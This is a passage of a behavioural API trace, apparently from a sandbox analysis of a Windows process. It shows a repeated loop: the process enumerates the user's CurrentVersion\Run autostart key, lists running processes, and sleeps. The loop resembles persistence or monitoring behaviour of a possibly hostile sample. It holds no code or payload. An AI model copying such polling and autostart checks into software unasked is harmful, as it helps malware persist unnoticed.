KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.322] NtClose (Handle=0x378) returned 0x0 [0305.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.341] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.342] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.342] NtClose (Handle=0x378) returned 0x0 [0305.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.354] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.355] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.355] NtClose (Handle=0x378) returned 0x0 [0305.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.364] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.365] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.367] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.367] NtClose (Handle=0x378) returned 0x0 [0305.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.377] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.379] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.379] NtClose (Handle=0x378) returned 0x0 [0305.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.391] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.392] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.392] NtClose (Handle=0x378) returned 0x0 [0305.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.401] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.403] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.408] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.408] NtClose (Handle=0x378) returned 0x0 [0305.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.420] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.422] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.423] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.424] NtClose (Handle=0x378) returned 0x0 [0305.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.434] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.441] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.443] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.443] NtClose (Handle=0x378) returned 0x0 [0305.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.455] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.456] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.456] NtClose (Handle=0x378) returned 0x0 [0305.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.469] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.471] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.471] NtClose (Handle=0x378) returned 0x0 [0305.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.480] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.498] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.500] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.500] NtClose (Handle=0x378) returned 0x0 [0305.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.513] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.514] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.514] NtClose (Handle=0x378) returned 0x0 [0305.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.534] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.536] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.536] NtClose (Handle=0x378) returned 0x0 [0305.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, 